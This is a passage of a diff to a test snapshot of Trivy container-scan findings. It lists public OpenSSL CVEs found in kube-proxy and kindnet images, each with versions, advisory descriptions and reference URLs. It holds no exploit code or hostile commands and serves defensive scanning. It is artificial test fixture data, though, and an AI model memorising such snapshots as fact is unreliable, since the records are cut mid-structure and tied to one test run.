"scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "the c_rehash script allows command injection", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2068", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2068", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - }, - { - "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", - }, - { - "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-2068.html", + "value": "https://linux.oracle.com/cve/CVE-2022-1292.html", }, { "type": "URL", @@ -162619,172 +162567,27 @@ and the severity is therefore considered low.", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", - }, - { - "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", - }, - { - "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220707-0008/", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5488-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5488-2", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-2068", - }, - { - "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5169", - }, - { - "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220621.txt", - }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.1.1d-0+deb10u7", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3712", - "installedVersion": "1.1.1d-0+deb10u6", - "packageName": "libssl1.1", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/26/2", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", - "https://access.redhat.com/security/cve/CVE-2021-3712", - "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", - "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", - "https://linux.oracle.com/cve/CVE-2021-3712.html", - "https://linux.oracle.com/errata/ELSA-2022-9023.html", - "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", - "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", - "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", - "https://security.gentoo.org/glsa/202209-02", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20210827-0010/", - "https://ubuntu.com/security/notices/USN-5051-1", - "https://ubuntu.com/security/notices/USN-5051-2", - "https://ubuntu.com/security/notices/USN-5051-3", - "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", - "https://ubuntu.com/security/notices/USN-5088-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3712", - "https://www.debian.org/security/2021/dsa-4963", - "https://www.openssl.org/news/secadv/20210824.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-16", - "https://www.tenable.com/security/tns-2022-02", - ], - }, - "category": "Vulnerability", - "description": "ASN.1 strings are represented internally within OpenSSL as an ASN1_STRING structure which contains a buffer holding the string data and a field holding the buffer length. This contrasts with normal C strings which are repesented as a buffer for the string data which is terminated with a NUL (0) byte. Although not a strict requirement, ASN.1 strings that are parsed using OpenSSL's own "d2i" functions (and other similar parsing functions) as well as any string whose value has been set with the ASN1_STRING_set() function will additionally NUL terminate the byte array in the ASN1_STRING structure. However, it is possible for applications to directly construct valid ASN1_STRING structures which do not NUL terminate the byte array by directly setting the "data" and "length" fields in the ASN1_STRING array. This can also happen by using the ASN1_STRING_set0() function. Numerous OpenSSL functions that print ASN.1 data have been found to assume that the ASN1_STRING byte array will be NUL terminated, even though this is not guaranteed for strings that have been directly constructed. Where an application requests an ASN.1 structure to be printed, and where that ASN.1 structure contains ASN1_STRINGs that have been directly constructed by the application without NUL terminating the "data" field, then a read buffer overrun can occur. The same thing can also occur during name constraints processing of certificates (for example if a certificate has been directly constructed by the application instead of loading it via the OpenSSL parsing functions, and the certificate contains non NUL terminated ASN1_STRING structures). It can also occur in the X509_get1_email(), X509_REQ_get1_email() and X509_get1_ocsp() functions. If a malicious actor can cause an application to directly construct an ASN1_STRING and then process it through one of the affected OpenSSL functions then this issue could be hit. This might result in a crash (causing a Denial of Service attack). It could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext). Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k). Fixed in OpenSSL 1.0.2za (Affected 1.0.2-1.0.2y).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "openssl: Read buffer overruns processing ASN.1 strings", - "references": [ - { - "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3712", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3712.json", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3712", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-244969.pdf", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3712", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=94d23fcff9b2a7a8368dfe52214d5c2569882c11", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ccb0a11145ee72b042d10593a64eaf9e8a55ec12", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-q9wj-f4qw-6vfj", - }, - { - "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3712.html", - }, - { - "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9023.html", - }, - { - "type": "URL", - "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - }, - { - "type": "URL", - "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00014.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00021.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3712", + "value": "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0098.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-02", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", }, { "type": "URL", @@ -162792,307 +162595,223 @@ and the severity is therefore considered low.", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-2", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-3", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-4 (regression only in trusty/esm)", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5088-1", - }, - { - "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3712", + "value": "https://security.netapp.com/advisory/ntap-20220602-0009/", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4963", + "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210824.txt", + "value": "https://ubuntu.com/security/notices/USN-5402-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://ubuntu.com/security/notices/USN-5402-2", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1292", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://www.debian.org/security/2022/dsa-5139", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-16", + "value": "https://www.openssl.org/news/secadv/20220503.txt", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-02", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1d-0+deb10u8", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0778", - "installedVersion": "1.1.1d-0+deb10u6", + "fixedVersion": "1.1.1n-0+deb11u3", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2068", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ - "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", - "http://seclists.org/fulldisclosure/2022/May/33", - "http://seclists.org/fulldisclosure/2022/May/35", - "http://seclists.org/fulldisclosure/2022/May/38", - "https://access.redhat.com/errata/RHSA-2022:5326", - "https://access.redhat.com/security/cve/CVE-2022-0778", - "https://bugzilla.redhat.com/2062202", - "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", - "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", - "https://errata.almalinux.org/8/ALSA-2022-5326.html", - "https://errata.rockylinux.org/RLSA-2022:4899", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", - "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", - "https://linux.oracle.com/cve/CVE-2022-0778.html", - "https://linux.oracle.com/errata/ELSA-2022-9272.html", - "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", - "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", - "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220321-0002/", - "https://security.netapp.com/advisory/ntap-20220429-0005/", - "https://support.apple.com/kb/HT213255", - "https://support.apple.com/kb/HT213256", - "https://support.apple.com/kb/HT213257", - "https://ubuntu.com/security/notices/USN-5328-1", - "https://ubuntu.com/security/notices/USN-5328-2", - "https://www.cve.org/CVERecord?id=CVE-2022-0778", - "https://www.debian.org/security/2022/dsa-5103", - "https://www.openssl.org/news/secadv/20220315.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.tenable.com/security/tns-2022-06", - "https://www.tenable.com/security/tns-2022-07", - "https://www.tenable.com/security/tns-2022-08", - "https://www.tenable.com/security/tns-2022-09", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2068", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", + "https://linux.oracle.com/cve/CVE-2022-2068.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", + "https://security.netapp.com/advisory/ntap-20220707-0008/", + "https://ubuntu.com/security/notices/USN-5488-1", + "https://ubuntu.com/security/notices/USN-5488-2", + "https://www.cve.org/CVERecord?id=CVE-2022-2068", + "https://www.debian.org/security/2022/dsa-5169", + "https://www.openssl.org/news/secadv/20220621.txt", ], }, "category": "Vulnerability", - "description": "The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop forever for non-prime moduli. Internally this function is used when parsing certificates that contain elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has invalid explicit curve parameters. Since certificate parsing happens prior to verification of the certificate signature, any process that parses an externally supplied certificate may thus be subject to a denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients consuming server certificates - TLS servers consuming client certificates - Hosting providers taking certificates or private keys from customers - Certificate authorities parsing certification requests from subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate which makes it slightly harder to trigger the infinite loop. However any operation which requires the public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-signed certificate to trigger the loop during verification of the certificate signature. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). Fixed in OpenSSL 1.1.1n (Affected 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "openssl: Infinite loop in BN_mod_sqrt() reachable when parsing certificates", + "name": "the c_rehash script allows command injection", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0778", - }, - { - "type": "URL", - "value": "http://packetstormsecurity.com/files/167344/OpenSSL-1.0.2-1.1.1-3.0-BN_mod_sqrt-Infinite-Loop.html", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/33", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/35", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/38", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:5326", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0778", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2062202", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2062202", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-712929.pdf", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0778", - }, - { - "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2022-5326.html", - }, - { - "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4899", + "value": "https://avd.aquasec.com/nvd/cve-2022-2068", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3118eb64934499d93db3230748a452351d1d9a65", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=380085481c64de749a6dd25cdf0bcf4360b30f83", + "value": "https://access.redhat.com/security/cve/CVE-2022-2068", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a466912611aa6cbdf550cd10601390e587451246", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-x3mh-jvjw-3xwx", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-0778.html", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9272.html", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00024.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/323SNN6ZX7PRJJWP2BUAFLPUAE42XWLZ/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GDB3GQVJPXJE7X5C5JN6JAA4XUDWD6E6/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W6K3PR542DXWLEFFMFIDMME4CWMHJRMG/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0778", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0002", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2022-0014.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220321-0002/", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0005/", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213255", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213256", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213257", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5328-1", + "value": "https://linux.oracle.com/cve/CVE-2022-2068.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5328-2", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0778", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5103", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220315.txt", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://security.netapp.com/advisory/ntap-20220707-0008/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://ubuntu.com/security/notices/USN-5488-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-06", + "value": "https://ubuntu.com/security/notices/USN-5488-2", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-07", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2068", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-08", + "value": "https://www.debian.org/security/2022/dsa-5169", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-09", + "value": "https://www.openssl.org/news/secadv/20220621.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2022-4450", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2023:2165", @@ -163145,7 +162864,7 @@ and the severity is therefore considered low.", }, "category": "Vulnerability", "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, "name": "double free after calling PEM_read_bio_ex", "references": [ @@ -163342,10 +163061,10 @@ and the severity is therefore considered low.", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u4", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", "id": "CVE-2023-0215", - "installedVersion": "1.1.1d-0+deb10u6", + "installedVersion": "1.1.1n-0+deb11u1", "packageName": "libssl1.1", "references": [ "https://access.redhat.com/errata/RHSA-2023:2165", @@ -163402,7 +163121,8 @@ and the severity is therefore considered low.", ], }, "category": "Vulnerability", - "description": "The public API function BIO_new_NDEF is a helper function used for streaming + 